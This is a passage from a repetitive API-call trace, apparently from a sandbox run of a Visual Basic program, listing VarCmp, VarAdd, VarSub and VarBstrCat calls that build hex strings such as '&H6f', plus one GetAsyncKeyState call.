pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.370] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.370] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.370] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.370] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.370] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.370] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.370] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.561] GetAsyncKeyState (vKey=3) returned 0 [0112.561] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.561] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.561] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.562] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.562] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.562] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.562] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.562] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.562] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.562] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.562] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.562] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.562] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.562] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.562] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.562] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.562] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.562] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.562] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.562] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.562] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.562] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.562] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.562] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.562] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.563] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.563] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.563] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.563] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.563] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.563] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.563] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.563] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.563] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.563] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.563] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.563] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.563] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.563] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.563] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.563] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.564] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.564] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.564] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.564] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.564] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.564] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.564] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.564] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.564] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.564] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.564] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.564] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.564] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.565] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.565] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.565] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.565] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.565] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.565] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.565] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.565] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.565] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.565] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.565] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.565] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.565] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.565] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.565] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.565] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.565] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.565] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.565] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.565] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.565] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.566] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.566] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.566] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.566] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.566] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.566] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.566] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.566] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.566] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.566] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.566] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.566] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.566] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.566] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.566] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.566] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.566] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.566] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.567] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.567] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.567] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.567] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.567] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.567] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.567] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.567] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.567] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.567] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.567] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.567] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.567] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.567] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.567] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.567] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.567] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.567] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.567] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.567] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.567] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.567] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.568] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.568] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.568] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.568] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.568] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.568] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.568] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.568] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.568] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.568] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.568] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.568] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.568] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.568] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.568] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.568] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.568] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.568] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.569] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.569] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.569] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.569] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.569] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.569] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.569] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.569] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.569] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.569] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.569] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.569] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.569] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.569] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.569] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.569] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.569] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.569] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.569] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.569] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.569] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.569] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.570] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.570] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.570] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.570] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.570] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.570] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.570] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.570] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.570] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.570] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.570] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.570] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.570] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.570] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.570] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.570] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.570] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.571] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.571] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.571] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.571] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.571] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.571] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.571] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.571] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.571] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.571] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.571] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.571] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.571] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.571] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.571] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.571] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.571] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.571] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.571] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.571] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.571] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.571] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.571] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.572] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.572] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.572] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.572] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.572] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.572] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.572] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.572] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.572] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.572] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.572] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.572] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.572] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.572] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.572] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.572] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.572] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.573] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.573] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.573] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) 